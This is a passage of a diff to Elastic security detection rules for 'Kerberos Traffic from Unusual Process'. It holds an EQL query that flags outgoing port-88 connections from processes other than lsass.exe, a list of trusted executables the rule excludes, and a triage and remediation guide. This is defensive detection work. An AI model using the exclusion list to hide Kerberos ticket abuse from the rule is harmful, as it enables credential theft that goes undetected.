process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port \u003e= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and \n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\", \n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\", \n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\"\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", "related_integrations": [ { "package": "endpoint", @@ -72,7 +72,7 @@ ], "risk_score": 47, "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_108.json b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_108.json index 2b7d9d8609e..cedcf38ffbb 100644 --- a/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_108.json +++ b/packages/security_detection_engine/kibana/security_rule/897dc6b5-b39f-432a-8d75-d3730d50c782_108.json @@ -14,8 +14,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Kerberos Traffic from Unusual Process", - "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction == \"egress\" and\n destination.port == 88 and source.port \u003e= 49152 and process.pid != 4 and destination.address : \"*\" and\n not \n (\n process.executable : (\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\Amazon Corretto\\\\jdk1*\\\\bin\\\\java.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Core\\\\tomcat-core\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files\\\\DBeaver\\\\dbeaver.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.backend.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files\\\\Oracle\\\\VirtualBox\\\\VirtualBoxVM.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files\\\\Silverfort\\\\Silverfort AD Adapter\\\\SilverfortServer.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files (x86)\\\\SAP BusinessObjects\\\\tomcat\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\vmnat.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\",\n \"System\"\n ) and process.code_signature.trusted == true\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for client/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of traffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of Kerberos tickets.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a non-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "network where host.os.type == \"windows\" and event.type == \"start\" and network.direction == \"egress\" and\n destination.port == 88 and source.port >= 49152 and process.pid != 4 and destination.address : \"*\" and\n not \n (\n process.executable : (\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap oem\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\Amazon Corretto\\\\jdk1*\\\\bin\\\\java.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Proxy Server\\\\bin\\\\prunsrv.exe\",\n \"?:\\\\Program Files\\\\BlackBerry\\\\UEM\\\\Core\\\\tomcat-core\\\\bin\\\\tomcat9.exe\",\n \"?:\\\\Program Files\\\\DBeaver\\\\dbeaver.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.backend.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\com.docker.vpnkit.exe\",\n \"?:\\\\Program Files\\\\Docker\\\\Docker\\\\resources\\\\vpnkit.exe\",\n \"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition*\\\\bin\\\\pycharm64.exe\",\n \"?:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Program Files\\\\Oracle\\\\VirtualBox\\\\VirtualBoxVM.exe\",\n \"?:\\\\Program Files\\\\Puppet Labs\\\\Puppet\\\\puppet\\\\bin\\\\ruby.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files\\\\Silverfort\\\\Silverfort AD Adapter\\\\SilverfortServer.exe\",\n \"?:\\\\Program Files\\\\Tenable\\\\Nessus\\\\nessusd.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware View\\\\Server\\\\bin\\\\ws_TomcatService.exe\",\n \"?:\\\\Program Files (x86)\\\\Advanced Port Scanner\\\\advanced_port_scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\DesktopCentral_Agent\\\\bin\\\\dcpatchscan.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Silverlight\\\\sllauncher.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap OEM\\\\nmap.exe\",\n \"?:\\\\Program Files (x86)\\\\nwps\\\\NetScanTools Pro\\\\NSTPRO.exe\",\n \"?:\\\\Program Files (x86)\\\\SAP BusinessObjects\\\\tomcat\\\\bin\\\\tomcat9.exe\",\n 